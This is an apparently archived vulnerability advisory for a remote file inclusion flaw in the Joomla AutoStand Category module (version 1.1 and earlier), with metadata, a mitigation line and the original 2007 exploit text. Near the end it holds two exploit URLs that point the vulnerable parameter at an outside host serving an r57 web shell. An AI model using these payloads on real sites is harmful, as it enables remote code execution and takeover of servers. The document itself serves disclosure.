Joomla Module AutoStand Category

vendor:

by:

Cold z3ro

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Joomla Module AutoStand Category

Affected Version From: <= 1.1

Affected Version To: Not mentioned

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

2007

Joomla Module AutoStand Category <= 1.1 Remote File include Vulnerabilities

The vulnerability allows remote attackers to include arbitrary files via a vulnerable parameter in mod_as_category.php.

Mitigation:

Update to the latest version of Joomla Module AutoStand Category.

Source

Exploit-DB raw data:

=======================================================
Joomla Module AutoStand Category <= 1.1 Remote File include Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site : 
http://www.joomlafrance.org/telecharger/startdown/AutoStand_Category.html
=======================================================
Description: its a joomla module Shows the categories created
=======================================================

File : /mod_as_category/mod_as_category.php
#  include($mosConfig_absolute_path . 
"/components/com_autostand/languages/portuguese.php  <= line 10

# Don't allow direct acces to the file
  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' ); <= line  21+22
========================================================
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-14]